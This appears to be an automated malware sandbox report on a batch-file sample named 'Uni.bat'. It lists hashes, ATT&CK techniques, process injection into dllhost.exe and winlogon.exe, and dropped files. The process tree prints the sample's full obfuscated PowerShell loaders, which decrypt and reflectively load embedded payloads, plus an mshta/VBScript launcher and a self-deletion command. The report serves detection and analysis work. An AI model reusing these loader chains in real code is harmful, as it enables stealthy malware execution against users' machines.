78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f

General

Target

Uni.bat
Size

12.6MB
MD5

898f49c739026123b6a3811fa31abe70
SHA1

31ff6036b40d70d21cb1c4c0163cba0d4c720551
SHA256

78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
SHA512

a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d
SSDEEP

49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

Uni.bat.exe

description pid process target process

PID 212 created 556 212 Uni.bat.exe winlogon.exe
PID 212 created 556 212 Uni.bat.exe winlogon.exe

description	pid	process	target process
PID 212 created 556	212	Uni.bat.exe	winlogon.exe
PID 212 created 556	212	Uni.bat.exe	winlogon.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

$sxr-mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\International\Geo\Nation	$sxr-mshta.exe

Deletes itself 1 IoCs

Processes:

Uni.bat.exe

pid process

212 Uni.bat.exe
Executes dropped EXE 4 IoCs

Processes:

Uni.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe

pid process

212 Uni.bat.exe
1580 $sxr-mshta.exe
4400 $sxr-cmd.exe
2336 $sxr-powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

Uni.bat.exe

description	pid	process	target process
PID 212 set thread context of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 set thread context of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 set thread context of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 set thread context of 1732	212	Uni.bat.exe	dllhost.exe

Drops file in Windows directory 6 IoCs

Processes:

Uni.bat.exe

description	ioc	process
File created	C:\Windows\$sxr-powershell.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Uni.bat.exe
File created	C:\Windows\$sxr-mshta.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	Uni.bat.exe
File created	C:\Windows\$sxr-cmd.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	Uni.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3928 taskkill.exe
Modifies registry class 1 IoCs

Processes:

$sxr-mshta.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance $sxr-mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

696 PING.EXE

pid	process
3928	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	$sxr-mshta.exe

pid	process
696	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

Uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe

pid	process
212	Uni.bat.exe
212	Uni.bat.exe
212	Uni.bat.exe
212	Uni.bat.exe
3028	dllhost.exe
3028	dllhost.exe
1388	dllhost.exe
1388	dllhost.exe
1388	dllhost.exe
1388	dllhost.exe
3028	dllhost.exe
3028	dllhost.exe
212	Uni.bat.exe
212	Uni.bat.exe
2336	$sxr-powershell.exe
2336	$sxr-powershell.exe
2336	$sxr-powershell.exe
2336	$sxr-powershell.exe
212	Uni.bat.exe
4664	dllhost.exe
4664	dllhost.exe
4664	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
4664	dllhost.exe
4664	dllhost.exe
212	Uni.bat.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

Uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	212	Uni.bat.exe
Token: SeDebugPrivilege	212	Uni.bat.exe
Token: SeDebugPrivilege	3028	dllhost.exe
Token: SeDebugPrivilege	1388	dllhost.exe
Token: SeDebugPrivilege	2336	$sxr-powershell.exe
Token: SeDebugPrivilege	212	Uni.bat.exe
Token: SeDebugPrivilege	4664	dllhost.exe
Token: SeDebugPrivilege	1732	dllhost.exe
Token: SeDebugPrivilege	3928	taskkill.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

cmd.exeUni.bat.exe$sxr-mshta.exe$sxr-cmd.execmd.exe

description	pid	process	target process
PID 4196 wrote to memory of 212	4196	cmd.exe	Uni.bat.exe
PID 4196 wrote to memory of 212	4196	cmd.exe	Uni.bat.exe
PID 212 wrote to memory of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 3028	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1388	212	Uni.bat.exe	dllhost.exe
PID 1580 wrote to memory of 4400	1580	$sxr-mshta.exe	$sxr-cmd.exe
PID 1580 wrote to memory of 4400	1580	$sxr-mshta.exe	$sxr-cmd.exe
PID 4400 wrote to memory of 2336	4400	$sxr-cmd.exe	$sxr-powershell.exe
PID 4400 wrote to memory of 2336	4400	$sxr-cmd.exe	$sxr-powershell.exe
PID 212 wrote to memory of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 4664	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 1732	212	Uni.bat.exe	dllhost.exe
PID 212 wrote to memory of 4796	212	Uni.bat.exe	cmd.exe
PID 212 wrote to memory of 4796	212	Uni.bat.exe	cmd.exe
PID 4796 wrote to memory of 696	4796	cmd.exe	PING.EXE
PID 4796 wrote to memory of 696	4796	cmd.exe	PING.EXE
PID 4796 wrote to memory of 3928	4796	cmd.exe	taskkill.exe
PID 4796 wrote to memory of 3928	4796	cmd.exe	taskkill.exe
PID 4796 wrote to memory of 376	4796	cmd.exe	attrib.exe
PID 4796 wrote to memory of 376	4796	cmd.exe	attrib.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

376 attrib.exe

pid	process
376	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:556

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0a225c06-757b-4db7-9659-02b3172ec7f5}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{857b0a7e-dce5-440d-ac87-3f8b35b0d544}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4196

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Deletes itself
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{6b102379-c07e-4ec6-9729-820971d523ac}
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ae81a5e7-346a-44cf-b8c0-094f3207bac4}
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\system32\PING.EXE
PING localhost -n 8
4⤵
- Runs ping.exe
PID:696

C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
4⤵
- Views/modifies file attributes
PID:376

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51xyzvhd.lte.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\$sxr-cmd.exe
Filesize
265KB

MD5
94912c1d73ade68f2486ed4d8ea82de6

SHA1
524ab0a40594d2b5f620f542e87a45472979a416

SHA256
9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9

SHA512
f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

Download Submit
C:\Windows\$sxr-mshta.exe
Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
memory/212-36-0x00007FFFB5970000-0x00007FFFB5A1E000-memory.dmp

Filesize
696KB

Download
memory/212-62-0x00007FFFB6E60000-0x00007FFFB703B000-memory.dmp

Filesize
1.9MB

Download
memory/212-14-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-27-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-32-0x000001F110000000-0x000001F110024000-memory.dmp

Filesize
144KB

Download
memory/212-12-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-35-0x00007FFFB6E60000-0x00007FFFB703B000-memory.dmp

Filesize
1.9MB

Download
memory/212-37-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-38-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-39-0x000001F100290000-0x000001F100CE0000-memory.dmp

Filesize
10.3MB

Download
memory/212-41-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-42-0x000001F100CE0000-0x000001F100D86000-memory.dmp

Filesize
664KB

Download
memory/212-57-0x000001F100D90000-0x000001F100DE6000-memory.dmp

Filesize
344KB

Download
memory/212-58-0x000001F100DF0000-0x000001F100E48000-memory.dmp

Filesize
352KB

Download
memory/212-59-0x000001F100E50000-0x000001F100E72000-memory.dmp

Filesize
136KB

Download
memory/212-144-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-70-0x000001F101100000-0x000001F10110A000-memory.dmp

Filesize
40KB

Download
memory/212-161-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-143-0x00007FFF9ADA3000-0x00007FFF9ADA4000-memory.dmp

Filesize
4KB

Download
memory/212-147-0x00007FFFB6E60000-0x00007FFFB703B000-memory.dmp

Filesize
1.9MB

Download
memory/212-78-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-160-0x00007FFFAE742000-0x00007FFFAE743000-memory.dmp

Filesize
4KB

Download
memory/212-79-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/212-9-0x000001F16F2A0000-0x000001F16F2C2000-memory.dmp

Filesize
136KB

Download
memory/212-6-0x00007FFF9ADA3000-0x00007FFF9ADA4000-memory.dmp

Filesize
4KB

Download
memory/212-16-0x000001F16F570000-0x000001F16F5E6000-memory.dmp

Filesize
472KB

Download
memory/212-148-0x00007FFFB5970000-0x00007FFFB5A1E000-memory.dmp

Filesize
696KB

Download
memory/1388-77-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
